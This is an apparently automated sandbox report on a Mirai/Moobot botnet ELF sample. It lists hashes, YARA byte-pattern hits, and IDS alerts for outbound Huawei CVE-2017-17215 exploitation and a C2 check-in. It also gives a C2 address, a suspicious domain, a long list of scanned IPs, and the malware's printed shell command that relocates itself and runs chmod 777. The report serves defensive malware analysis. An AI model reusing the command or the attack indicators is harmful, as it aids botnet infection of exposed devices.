Linux Analysis Report
x86_64.elf

Overview

General Information

Sample Name:x86_64.elf
Analysis ID:830862
MD5:31bc5e9f752e5b6bbd24544e54142086
SHA1:2a2cfe59b83fb19829cc19fe1dfbc7d6cd6b57ff
SHA256:334de74bf734a40b9a1d9b9f8fc9b694bd3ae544d99c09a7e5dd400d5cf3343b
Tags:elf, Gafgyt, mirai
Infos:

Detection

Mirai, Moobot
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

None of the HTTP servers contacted by the sample answer. The sample is likely an old dropper that no longer works.
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830862
Start date and time:2023-03-20 18:44:30 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 37s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:x86_64.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@1/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
Command:/tmp/x86_64.elf
PID:6226
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:sh: 1: cannot create bin/watchdog: Directory nonexistent
chmod: cannot access 'bin/watchdog': No such file or directory
  • system is lnxubuntu20
  • x86_64.elf (PID: 6226, Parent: 6122, MD5: 31bc5e9f752e5b6bbd24544e54142086) Arguments: /tmp/x86_64.elf
    • sh (PID: 6227, Parent: 6226, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/watchdog && mkdir bin@\\x9e~l\\xfc; >bin/watchdog && mv /tmp/x86_64.elf bin/watchdog; chmod 777 bin/watchdog"
      • sh New Fork (PID: 6228, Parent: 6227)
      • rm (PID: 6228, Parent: 6227, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/watchdog
      • sh New Fork (PID: 6229, Parent: 6227)
      • mkdir (PID: 6229, Parent: 6227, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin@\\x9e~l\\xfc
      • sh New Fork (PID: 6231, Parent: 6227)
      • chmod (PID: 6231, Parent: 6227, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/watchdog
  • cleanup
Name:Mirai
Description:Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution:No Attribution
Link:https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name:MooBot
Attribution:No Attribution
Link:https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Source | Rule | Description | Author | Strings
x86_64.elf | JoeSecurity_Moobot | Yara detected Moobot | Joe Security
x86_64.elf | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
x86_64.elf | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown
x86_64.elf | Linux_Trojan_Gafgyt_9e9530a7 | unknown | unknown
  • 0x912c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
x86_64.elf | Linux_Trojan_Gafgyt_807911a2 | unknown | unknown
  • 0x97df:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D

Source | Rule | Description | Author | Strings
6226.1.0000000000400000.000000000040f000.r-x.sdmp | JoeSecurity_Moobot | Yara detected Moobot | Joe Security
6226.1.0000000000400000.000000000040f000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security
6226.1.0000000000400000.000000000040f000.r-x.sdmp | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown
6226.1.0000000000400000.000000000040f000.r-x.sdmp | Linux_Trojan_Gafgyt_9e9530a7 | unknown | unknown
  • 0x912c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
6226.1.0000000000400000.000000000040f000.r-x.sdmp | Linux_Trojan_Gafgyt_807911a2 | unknown | unknown
  • 0x97df:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D

Timestamp | SID | Protocol | Source | Destination | Classtype
03/20/23-18:45:24.095464 | 2835222 | TCP | 192.168.2.23:59722 | 41.237.57.24:37215 | A Network Trojan was detected
03/20/23-18:46:43.951969 | 2835222 | TCP | 192.168.2.23:55010 | 34.117.60.121:37215 | A Network Trojan was detected
03/20/23-18:46:49.166628 | 2835222 | TCP | 192.168.2.23:55956 | 172.87.207.26:37215 | A Network Trojan was detected
03/20/23-18:45:18.014810 | 2030490 | TCP | 192.168.2.23:36176 | 195.133.40.202:56999 | A Network Trojan was detected
03/20/23-18:47:20.158707 | 2030489 | TCP | 195.133.40.202:56999 | 192.168.2.23:36176 | A Network Trojan was detected
03/20/23-18:46:43.953554 | 2835222 | TCP | 192.168.2.23:45848 | 34.120.62.25:37215 | A Network Trojan was detected
03/20/23-18:46:40.914230 | 2835222 | TCP | 192.168.2.23:43420 | 147.146.246.207:37215 | A Network Trojan was detected
03/20/23-18:45:35.250142 | 2835222 | TCP | 192.168.2.23:48448 | 41.44.217.38:37215 | A Network Trojan was detected
03/20/23-18:45:47.393680 | 2835222 | TCP | 192.168.2.23:53138 | 41.47.127.89:37215 | A Network Trojan was detected
03/20/23-18:46:09.990245 | 2835222 | TCP | 192.168.2.23:46886 | 197.246.253.72:37215 | A Network Trojan was detected
03/20/23-18:46:40.895758 | 2835222 | TCP | 192.168.2.23:47404 | 65.121.182.204:37215 | A Network Trojan was detected
03/20/23-18:46:11.261546 | 2835222 | TCP | 192.168.2.23:55138 | 154.211.39.154:37215 | A Network Trojan was detected

AV Detection

Source: x86_64.elf, ReversingLabs: Detection: 53%
Source: x86_64.elf, Virustotal: Detection: 62%
Source: x86_64.elf, Joe Sandbox ML: detected

Networking

Source: Traffic, Snort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:36176 -> 195.133.40.202:56999
Source: Traffic, Snort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 195.133.40.202:56999 -> 192.168.2.23:36176
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59722 -> 41.237.57.24:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48448 -> 41.44.217.38:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53138 -> 41.47.127.89:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46886 -> 197.246.253.72:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55138 -> 154.211.39.154:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47404 -> 65.121.182.204:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43420 -> 147.146.246.207:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55010 -> 34.117.60.121:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45848 -> 34.120.62.25:37215
Source: Traffic, Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55956 -> 172.87.207.26:37215
Source: global traffic, TCP traffic: 197.128.96.186 ports 1,2,3,5,7,37215
Source: unknown, Network traffic detected: HTTP traffic on port 59722 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 59722
Source: unknown, Network traffic detected: HTTP traffic on port 48448 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 48448
Source: unknown, Network traffic detected: HTTP traffic on port 53138 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 53138
Source: unknown, Network traffic detected: HTTP traffic on port 46886 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 37215 -> 46886
Source: unknown, Network traffic detected: HTTP traffic on port 55138 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 47404 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 43420 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 55010 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 45848 -> 37215
Source: unknown, Network traffic detected: HTTP traffic on port 55956 -> 37215
Source: DNS query: test.zxyes.xyz
Source: global traffic, TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic, TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic, TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.47.168.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.151.124.193:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.149.39.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 141.112.95.101:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.140.238.140:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.58.38.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 97.170.21.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.132.69.33:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 91.92.221.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.231.195.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.12.90.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.30.195.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 201.75.40.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.58.10.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.77.194.201:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.167.141.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.41.145.171:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 150.106.86.16:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.180.17.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 51.25.74.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 198.133.29.240:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.224.142.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 155.193.181.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.144.223.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.25.245.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.253.140.227:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.226.30.210:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 78.43.210.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.132.180.33:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.14.101.17:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 18.44.177.103:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.45.133.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.154.205.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.103.116.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.33.196.238:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 161.191.219.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 19.146.17.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.101.191.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.236.242.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.3.48.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.240.92.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.162.13.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 188.103.2.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.65.164.249:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.25.186.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.14.67.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.2.91.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.40.165.223:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.86.248.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.111.223.254:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 129.141.9.234:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.182.172.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 50.2.169.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 211.224.154.103:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.239.22.151:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 71.204.161.115:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.83.169.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 202.208.66.118:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.69.236.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.126.33.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 121.111.24.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 13.11.99.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 111.149.112.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 48.103.236.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.106.153.211:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.69.88.218:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.6.180.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.190.185.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:36176 -> 195.133.40.202:56999
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 86.132.121.197:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.100.39.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.86.46.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 90.35.51.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 182.214.161.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.174.90.118:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.127.27.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.193.99.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.209.209.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.199.116.86:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 47.163.249.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 185.152.54.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.4.56.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.64.75.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 95.15.67.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.206.197.221:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.244.235.151:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.49.13.147:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.10.74.163:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.211.170.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.61.97.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 167.214.137.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.140.21.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.154.183.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.248.123.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 98.4.56.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 95.158.212.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 76.0.49.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.126.71.170:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.3.105.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.105.141.13:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.183.32.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 154.37.35.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 196.176.2.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 68.144.186.182:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.227.162.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.242.13.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.127.63.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.196.85.136:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 100.29.232.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.130.98.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.186.12.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.155.85.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.194.193.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.47.48.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.23.143.229:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 139.94.68.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.116.187.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.119.102.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 179.39.158.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 148.166.122.238:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 149.168.246.21:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.93.85.106:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.64.114.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 67.101.189.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 24.139.0.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.155.90.9:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.128.244.214:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 209.118.213.86:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.115.97.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.151.133.12:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.236.181.211:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.228.186.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.62.166.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 45.122.57.250:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.62.92.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 126.58.57.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 178.90.191.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.94.168.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.232.122.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 130.106.66.234:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.236.94.33:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 50.137.5.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 63.123.54.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.145.59.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.28.22.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.126.219.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.172.168.90:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.172.207.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.81.28.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 198.105.55.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.83.163.100:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 216.177.5.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 131.45.174.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.103.226.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.118.196.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.169.167.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.133.175.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.133.86.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.20.103.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.213.131.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.123.206.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 101.126.163.30:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 112.161.61.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.198.12.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.42.83.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.96.115.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.52.57.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.46.105.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 110.57.147.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 78.187.214.162:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 198.144.98.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.83.198.207:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.152.159.13:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.228.52.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.224.66.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 204.246.143.72:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.98.97.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.209.250.86:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.21.77.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.41.151.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 63.49.114.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.204.211.39:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.38.217.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 110.176.183.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.32.177.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.128.19.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.122.112.124:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.105.159.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.167.54.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 97.62.134.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 198.184.157.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.136.191.123:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.40.50.26:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.16.221.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.148.177.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.118.221.162:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.204.74.77:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.95.119.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.216.74.154:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.249.72.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.170.31.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.13.99.53:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.148.89.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.1.24.169:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.22.61.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.247.212.37:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.133.109.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.59.185.224:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 74.68.11.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 221.80.131.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.255.22.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.99.70.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.73.17.241:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 70.157.22.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.38.118.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.8.47.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.155.98.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 199.202.134.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.234.28.215:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.201.77.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.223.87.85:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 166.159.133.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.16.253.214:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 123.197.141.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.60.191.114:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.155.105.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.27.58.86:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 153.124.235.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.101.72.21:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.29.221.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 193.44.110.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 190.64.160.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.46.100.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.224.208.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 145.4.74.62:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.245.241.149:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.125.213.191:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.224.225.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.22.195.142:37215
